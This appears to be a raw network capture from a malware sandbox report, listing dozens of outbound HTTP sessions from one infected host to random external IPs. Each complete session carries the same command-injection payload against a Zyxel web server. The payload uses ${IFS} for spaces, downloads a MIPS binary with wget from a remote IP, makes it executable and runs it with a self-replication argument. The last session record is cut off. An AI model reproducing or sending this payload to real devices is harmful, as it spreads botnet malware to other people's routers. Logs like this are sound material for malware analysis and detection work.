                                                        198192.168.2.1450676160.99.12.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:14.963608980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        199192.168.2.1446396189.16.3.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:14.963624001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        200192.168.2.1457568205.162.91.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:14.963646889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        201192.168.2.144000236.157.5.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.967900991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        202192.168.2.1439316162.46.191.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.967953920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        203192.168.2.1445434175.82.92.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.967983961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        204192.168.2.1445636190.225.130.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968012094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        205192.168.2.1452834222.64.255.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968076944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        206192.168.2.144732036.165.46.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968107939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        207192.168.2.1452682167.162.52.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968153000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        208192.168.2.1442824173.183.1.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968190908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        209192.168.2.144937414.16.99.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968226910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        210192.168.2.145501269.241.60.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968269110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        211192.168.2.1438052113.69.119.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968310118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        212192.168.2.145825846.193.203.153443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968349934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        213192.168.2.145608612.46.26.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968369961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        214192.168.2.14603081.82.201.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968404055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        215192.168.2.1449254181.137.71.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968431950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        216192.168.2.1446192160.17.62.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968486071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        217192.168.2.145439214.43.105.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968525887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        218192.168.2.1456374170.118.157.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968539953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        219192.168.2.144163259.158.45.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968571901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        220192.168.2.1460676192.252.207.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968627930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        221192.168.2.1460392221.224.53.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968657970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        222192.168.2.144174483.241.65.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968693972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        223192.168.2.1446802178.58.22.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968748093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        224192.168.2.144353249.65.67.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968774080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        225192.168.2.144809054.17.207.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968811989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        226192.168.2.1438194123.22.64.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968822002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        227192.168.2.1454214187.61.74.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968889952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        228192.168.2.145729674.30.123.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968889952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        229192.168.2.1457070181.109.88.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968926907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        230192.168.2.1440948157.76.53.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968934059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        231192.168.2.1438056148.213.244.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968962908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        232192.168.2.145435082.119.197.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.968996048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        233192.168.2.145680034.217.169.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.969038963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        234192.168.2.1455644175.238.74.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.969073057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        235192.168.2.144584612.146.16.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.969083071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        236192.168.2.1438898114.127.7.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.969156027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        237192.168.2.1450980197.24.223.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.969182968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        238192.168.2.145571213.60.93.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.969225883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        239192.168.2.1435468216.139.34.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.969243050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        240192.168.2.1453186171.178.235.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.969300985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        241192.168.2.145818652.90.70.141443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.969330072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        242192.168.2.145941872.163.90.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.969949007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        243192.168.2.14515048.38.82.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.969949007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        244192.168.2.143426476.68.179.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.970026970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        245192.168.2.1439944212.198.3.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.970186949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        246192.168.2.144994069.124.200.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.970189095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        247192.168.2.1445370120.0.137.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:15.970216990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        248192.168.2.1443860176.93.23.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:16.974438906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        249192.168.2.145976042.202.188.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:16.974473953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        250192.168.2.1452130131.65.22.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:16.974512100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        251192.168.2.1434400144.239.152.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:16.974539995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        252192.168.2.1447348101.107.57.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:16.974585056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        253192.168.2.145518657.148.233.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:16.974615097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        254192.168.2.145607480.229.155.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:16.974641085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        255192.168.2.145368245.2.29.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:16.974786043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        256192.168.2.1437928222.34.177.138443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:16.974807978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        257192.168.2.1450340151.18.240.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:16.974859953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        258192.168.2.144728082.62.103.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:16.974939108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        259192.168.2.1460764120.238.56.80443
                                                        TimestampBytes transferredDirectionData
